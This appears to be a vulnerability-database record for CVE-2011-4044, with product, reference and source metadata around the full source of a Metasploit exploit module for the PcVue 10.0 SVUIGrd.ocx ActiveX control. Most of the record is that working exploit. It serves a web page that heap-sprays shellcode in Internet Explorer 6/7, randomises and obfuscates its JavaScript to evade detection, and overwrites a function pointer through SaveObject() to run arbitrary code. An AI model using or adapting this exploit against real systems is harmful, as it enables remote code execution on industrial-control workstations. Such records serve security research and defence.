ID
VAR-E-201109-0009
CVE
| cve_id: | CVE-2011-4044 | Trust: 1.9 |
| cve_id: | CVE-2011-4043 | Trust: 0.3 |
| cve_id: | CVE-2011-4042 | Trust: 0.3 |
| cve_id: | CVE-2011-4045 | Trust: 0.3 |
EDB ID
17975
TITLE
PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()'/'SaveObject()' Trusted DWORD (Metasploit) - Windows remote Exploit
Trust: 0.6
DESCRIPTION
PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()'/'SaveObject()' Trusted DWORD (Metasploit). CVE-2011-4044CVE-77561 . remote exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | pcvue | model: | sv.uigrdctrl.1 | scope: | eq | version: | 10.0 | Trust: 1.6 |
| vendor: | arc | model: | informatique plantvue | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | arc | model: | informatique pcvue | scope: | eq | version: | 6 | Trust: 0.3 |
| vendor: | arc | model: | informatique pcvue | scope: | eq | version: | 10.0 | Trust: 0.3 |
| vendor: | arc | model: | informatique frontvue | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
##
# $Id: pcvue_func.rb 13889 2011-10-12 10:57:31Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => "PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",
'Description' => %q{
This module exploits a function pointer control within SVUIGrd.ocx of PcVue 10.0.
By setting a dword value for the SaveObject() or LoadObject(), an attacker can
overwrite a function pointer and execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Luigi Auriemma', # original find
'mr_me <steventhomasseeley[at]gmail-com>', # msf module
'TecR0c <roccogiovannicalvi[at]gmail-com >',# msf module
],
'Version' => '$Revision: 13889 $',
'References' =>
[
[ 'BID', '49795'],
[ 'URL', 'http://aluigi.altervista.org/adv/pcvue_1-adv.txt'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[
#IE 6/7 on Widnows XP and Vista
'Internet Explorer 6 / Internet Explorer 7',
{
'Ret' => 0x0a0a0a0a,
'Offset' => 1000
}
]
],
'DisclosureDate' => 'Oct 5 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]),
], self.class)
end
def on_request_uri(cli, request)
#If not IE, we don't continue
agent = request.headers['User-Agent']
if agent !~ /MSIE [6|7]\.0/
print_error("Target not supported: #{agent.to_s}")
send_not_found(cli)
return
end
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Setup exploit buffers
nops = Rex::Text.to_unescape([target.ret].pack('V'))
ret = "0x%08x" % target.ret
blocksize = 0x50000
fillto = 200
# Randomize the javascript variable names
obj_name = rand_text_alpha(rand(100) + 1)
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_ret = rand_text_alpha(rand(100) + 1)
j_headersize = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_block = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
j_txt = rand_text_alpha(rand(8) + 4)
js = <<-EOF
var #{j_shellcode} = unescape('#{shellcode}');
var #{j_nops} = unescape("#{nops}");
var #{j_headersize} = 20;
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
while(#{j_nops}.length < #{j_slackspace}) {
#{j_nops} += #{j_nops};
}
var #{j_fillblock} = #{j_nops}.substring(0, #{j_slackspace});
var #{j_block} = #{j_nops}.substring(0, #{j_nops}.length - #{j_slackspace});
while((#{j_block}.length + #{j_slackspace}) < #{blocksize}) {
#{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
}
#{j_memory} = new Array();
for(#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++){
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode} ;
}
function main(){
#{obj_name}.SaveObject("#{j_txt}.txt", #{ret}, 0);
}
EOF
js = js.gsub(/^\t\t/, '')
#JS obfuscation on demand
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
main_sym = js.sym('main')
else
main_sym = "main"
end
content = <<-EOF
<html>
<body>
<object classid='clsid:2BBD45A5-28AE-11D1-ACAC-0800170967D9' id='#{obj_name}' ></object>
<script language='javascript'>
#{js}
#{main_sym}();
</script>
</body>
</html>
EOF
#Remove the extra tabs from content
content = content.gsub(/^\t\t/, '')
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}")
send_response(cli, content, {'Content-Type'=>'text/html'})
end
end
=begin
Tested successfully on the following platforms:
- PcVue 10.0 (SVUIGrd.ocx v1.5.1.0) on Internet Explorer 6 & 7, Windows XP SP3
Class SVUIGrdCtrl
ProgID: SV.UIGrdCtrl.1
GUID: {2BBD45A5-28AE-11D1-ACAC-0800170967D9}
Number of Interfaces: 1
Default Interface: ISVUIGrd
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
=end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'LoadObject()'/'SaveObject()' Trusted DWORD (Metasploit)
Trust: 1.0
TAGS
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2011-4044 | Trust: 1.9 |
| db: | EXPLOIT-DB | id: | 17975 | Trust: 1.6 |
| db: | EDBNET | id: | 40472 | Trust: 0.6 |
| db: | ICS CERT | id: | ICSA-11-340-01 | Trust: 0.3 |
| db: | NVD | id: | CVE-2011-4043 | Trust: 0.3 |
| db: | NVD | id: | CVE-2011-4042 | Trust: 0.3 |
| db: | NVD | id: | CVE-2011-4045 | Trust: 0.3 |
| db: | BID | id: | 49795 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2011-4044 | Trust: 1.6 |
| url: | https://www.exploit-db.com/exploits/17975/ | Trust: 0.6 |
| url: | http://aluigi.altervista.org/adv/pcvue_1-adv.txt | Trust: 0.3 |
| url: | http://support.microsoft.com/kb/240797 | Trust: 0.3 |
| url: | http://www.us-cert.gov/control_systems/pdf/icsa-11-340-01.pdf | Trust: 0.3 |
| url: | http://www.arcinfo.com/index.php?option=com_content&id=2&itemid=151 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 49795 |
| db: | EXPLOIT-DB | id: | 17975 |
| db: | EDBNET | id: | 40472 |
LAST UPDATE DATE
2022-07-27T09:27:50.174000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 49795 | date: | 2011-12-06T22:07:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 49795 | date: | 2011-09-27T00:00:00 |
| db: | EXPLOIT-DB | id: | 17975 | date: | 2011-10-12T00:00:00 |
| db: | EDBNET | id: | 40472 | date: | 2011-10-12T00:00:00 |